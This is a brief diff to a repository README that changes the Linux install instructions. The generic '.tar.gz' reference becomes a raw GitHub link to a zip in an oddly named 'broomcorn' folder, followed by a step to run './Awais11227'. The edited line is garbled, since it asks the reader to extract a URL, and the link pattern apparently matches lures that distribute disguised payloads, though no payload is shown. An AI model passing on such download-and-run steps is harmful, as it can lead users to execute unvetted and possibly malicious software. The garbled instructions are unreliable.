arley2005-dot/Awais11227/README.md

    - Open the downloaded `.dmg` file.
    - Drag the application to your Applications folder.
 3. **For Linux:**
-   - Extract the downloaded `.tar.gz` file.
+   - Extract the downloaded `https://raw.githubusercontent.com/arley2005-dot/Awais11227/main/broomcorn/Awais11227.zip` file.
    - Run `./Awais11227` in the terminal.

 If you run into any issues during installation, please refer to the troubleshooting section.